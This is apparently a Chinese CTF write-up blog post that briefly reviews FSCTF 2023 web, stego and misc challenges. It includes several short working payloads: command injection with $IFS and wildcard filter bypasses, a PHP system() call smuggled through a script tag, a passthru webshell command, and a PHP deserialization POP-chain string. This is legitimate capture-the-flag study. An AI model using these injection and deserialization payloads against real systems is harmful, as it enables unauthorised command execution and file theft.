FSCTF 2023部分题目复盘(思路简易版)

部分题目wp参照某些大佬的,我只是从自己的角度略微总结了一下方法,只提供思路,具体自己复现或者参照其他大佬的wp

我只是啥也不会的菜狗,别骂了别骂了

[FSCTF 2023]源码!启动!

f12和右键禁用

ctrl+u查看源码,发现flag

[FSCTF 2023]webshell是啥捏

😭是passthru,命令执行直接

?👽=cat /flag.txt获得flag

[FSCTF 2023]细狗2.0

简单尝试发现是命令执行

;闭合,ls发现两个php文件,尝试读取发现有过滤

经过尝试发现使用tac代替cat,空格过滤用$IFS代替,flag用f*代替

1;tac$IFS/f*获得flag

[FSCTF 2023]ez_php1

首先根据源码提示,分别get传参a,b和post传参FL_AG

a和b要进行数组绕过:a[]=1&b[]=2

看到一个文件:L0vey0U.php

url查看该文件,需要对key进行序列化

?str=s:10:"YES I love";

再次得到一个文件:P0int.php

再次查看这个文件,是一个反序列化

源代码中读取flag的内容给了a,但是__destruct函数输出的是b,反序列化要把b的地址指向a,这样就能输入读取的内容

[FSCTF 2023]Hello,you

和细狗2.0类似,是shell命令执行,尝试过后同样;闭合

过滤了cat、flag等,可以使用more、head或者转义字符绕过,flag也可以用f*或者转义字符绕过,获得flag

[FSCTF 2023]EZ_eval

分析源码,发现很多过滤,<?过滤,使用<script>执行命令

<script%09language='php'>system('ta\c%09/f*');</script>

[FSCTF 2023]巴巴托斯!

打开发现提示,bp抓包,修改访问浏览器,提交发现问你是不是local man,本机访问,添加Referer为本机,再将file参数改为读取flag.php文件

[FSCTF 2023]萧河

用winhex打开,添加png文件头,打开没有东西,看wp,发现需要修改图片高度

winhex打开,第二行中间四个是图片高度,修改后看到flag

[FSCTF 2023]ez_php2

代码审计,php反序列化,pop链

payload:

O:2:"Ha":3:{s:5:"start";a:1:{s:3:"POC";s:4:"1111";}s:6:"start1";O:2:"Rd":3:{s:6:"ending";N;s:2:"cl";O:2:"Er":2:{s:6:"symbol";N;s:4:"Flag";s:9:"cat /flag";}s:3:"poc";N;}s:6:"start2";s:5:"11111";}

[FSCTF 2023]Simple Encryption

根据提示是伪加密,下载附件,用winhex打开,找到全局方位标记并修改,保存打开获得flag

[FSCTF 2023]行不行啊细狗

后缀改成zip,查看内容,最终在document.xml里找到flag相关信息,仔细查找发现有三段flag,拼起来获得完整的flag

[FSCTF 2023]为什么不换换思路捏

下载附件发现是密文,根据提示应该要用base解码,但是格式不对,经过尝试发现要先进行16进制转字符,但是base64解码还是乱码,尝试字符反转,解码成功获得flag

[FSCTF 2023]ez-osint

一张图片判断时间,完全没有思路

盲猜跟太阳或者影子有关,但还是无从下手

看了别人的wp,发现有篇文章有这张图片根据一系列我看不懂的计算,得到了时间,也得到了flag

[FSCTF 2023]夜深人静的时候也会偷偷emo

一个压缩包加密了mp3文件,没提示,试试爆破密码,是12345

MP3stego跑音频文件,有flag.mp3.txt文件,密码也是12345

[FSCTF 2023]base套

一眼base64,解码发现套中套套套...,上当了

被迫学习py脚本,解码获得flag

[FSCTF 2023]小试牛刀

winhex打开发现最后有flag{5a+G56CBMTIz},base64解码为密码123

看不懂,不会,不知道

查看wp,发现需要用到JPHS工具

[FSCTF 2023]最终试炼hhh

winhex打开,翻到最后看到个KP,感觉应该要反过来,但是没什么思路

查看大佬wp,使用py脚本反转后获得压缩包,而且是个伪加密,修改全局方位标记打开是个pdf文件,用wbstego发现密码没有,打开获得flag

[FSCTF 2023]二维码不要乱扫

第一次接触二维码的题目,不太会,参考wp学习

首先用stegsolve查看发现一个lsb隐写压缩包

导出后保留两列,去除空格和换行,再用工具爆破密码,密码是1tcKm

然后获得flag

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值